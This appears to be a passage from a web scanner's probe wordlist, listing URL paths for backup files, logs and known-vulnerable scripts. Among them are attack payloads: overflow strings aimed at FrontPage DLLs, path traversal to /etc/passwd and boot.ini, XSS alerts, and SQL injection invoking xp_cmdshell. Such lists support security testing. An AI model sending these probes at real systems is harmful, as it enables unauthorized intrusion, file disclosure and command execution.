/icons/small/_vti_bin/_vti_aut/dvwssr.dll?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
/icons/small/_vti_bin/_vti_aut/fp30reg.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/small/_vti_cnf/
/icons/small_
/icons/small~
/icons/small~1
/icons/small~1.lnk
/icons/small~bk
/icons/source.asp
/icons/sql.inc
/icons/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd
/icons/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/sqlconnect.inc
/icons/sqlnet.log
/icons/sqlnet.trc
/icons/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/srchadm/admin.idq
/icons/srchadm/webhits.exe
/icons/ssl_error.log
/icons/ssl_error_log
/icons/sso.login.controller
/icons/standard.inc
/icons/stat.asp
/icons/stat.cgi
/icons/stat.htm
/icons/stat.html
/icons/stat.php
/icons/stat/
/icons/statistics.asp
/icons/statistics.cgi
/icons/statistics.htm
/icons/statistics.html
/icons/statistics.php
/icons/stats.asp
/icons/stats.cgi
/icons/stats.htm
/icons/stats.html
/icons/stats.php
/icons/Stats/
/icons/stats/statsbrowse.asp?filepath=c:\&Opt=3
/icons/struts-virtdir/<script>alert(xss)</script>.do
/icons/support/common.php
/icons/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../../../../../etc/passwd
/icons/test
/icons/test-cgi
/icons/test-cgi.tcl
/icons/test-env
/icons/test.asp
/icons/test.aspx
/icons/test.bat
/icons/test.cfm
/icons/test.cgi
/icons/test.dbf
/icons/test.exe
/icons/test.htm
/icons/test.html
/icons/test.jsp
/icons/test.php
/icons/test.php3
/icons/test.pl
/icons/test.shtml
/icons/test.txt
/icons/Test11.asp
/icons/testing.asp
/icons/testing.cgi
/icons/testing.htm
/icons/testing.html
/icons/testing.txt
/icons/test_page25362.html
/icons/tmp
/icons/ToDo
/icons/ToDo.txt
/icons/tools/ct.htx
/icons/tools/ct.idc
/icons/tools/ctss.htx
/icons/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/icons/tools/details.idc
/icons/tools/dnsform.exe
/icons/tools/dsn.exe
/icons/tools/dsnform.exe
/icons/tools/getdrvrs.exe
/icons/tools/getdrvs.exe
/icons/tools/log.exe
/icons/tools/logs.exe
/icons/tools/mkilog.exe
/icons/tools/mkplog.exe
/icons/tools/newdns.exe
/icons/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/icons/Trace.axd
/icons/update.htm
/icons/update.html
/icons/upgrade.txt
/icons/upload.asp
/icons/uploadN.asp
/icons/UploadScript11.asp
/icons/uploadx.asp
/icons/usage.asp
/icons/usage.cgi
/icons/usage.htm
/icons/usage.html
/icons/usage.php
/icons/usage/
/icons/usage_200809.htm
/icons/usage_200809.html
/icons/usage_200810.htm
/icons/usage_200810.html
/icons/user.asp
/icons/user.cfg
/icons/user.cgi
/icons/user.dat
/icons/user.data
/icons/user.db
/icons/user.dbf
/icons/user.exe
/icons/user.htm
/icons/user.html
/icons/user.htx
/icons/user.ini
/icons/user.lst
/icons/user.pl
/icons/user.txt
/icons/users.asp
/icons/users.cfg
/icons/users.cgi
/icons/users.dat
/icons/users.data
/icons/users.db
/icons/users.dbf
/icons/users.exe
/icons/users.htm
/icons/users.html
/icons/users.htx
/icons/users.ini
/icons/users.lst
/icons/users.pl
/icons/users.txt
/icons/users/admins.htx
/icons/users/clients.htx
/icons/users/pass.htx
/icons/users/password.htx
/icons/users/passwords.htx
/icons/user_adm.html
/icons/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/icons/utils.inc
/icons/validate.inc
/icons/viewcode.asp?file=index.asp
/icons/ViewCode.asp?source=/../../../../../../boot.ini
/icons/wdir.txt
/icons/wdirs.txt
/icons/WEB-INF./web.xml
/icons/WEB-INF/web.xml
/icons/webauthor.htm
/icons/webplus.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/webstats.asp
/icons/webstats.cgi
/icons/webstats.html
/icons/webstats.php
/icons/WFDir0/
/icons/Winmsdp.exe?source=/../../../../../../boot.ini
/icons/WS_FTP.ini
/icons/WS_FTP.LOG
/icons/wwwstat.asp
/icons/wwwstat.php3
/icons/wwwstats.asp
/icons/wwwstats.cgi
/icons/wwwstats.htm
/icons/wwwstats.html
/icons/wwwstats.php
/icons/wwwstats.txt
/icons/wwwstats/
/icons/www_stats/
/icons/xferlog.txt
/icons/_README
/icons/_README.html
/icons/_root_.sys
/icons/_small
/icons/_vti_bin/shtml.dll
/icons/_vti_bin/_vti_aut/dvwssr.dll?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
/icons/_vti_bin/_vti_aut/fp30reg.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/_vti_cnf/
/icons/~README
/icons/~README.html
/icons/~small
/iconspopup.php?icodir=%2F..%2F..%2F..%2F
/icons_
/icons~
/icons~1
/icons~1.lnk
/icons~bk
/ICSLogin/
/icue_login.asp?error_msg=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/id/
/idea/
/ideas/
/idq.dll
/ids/
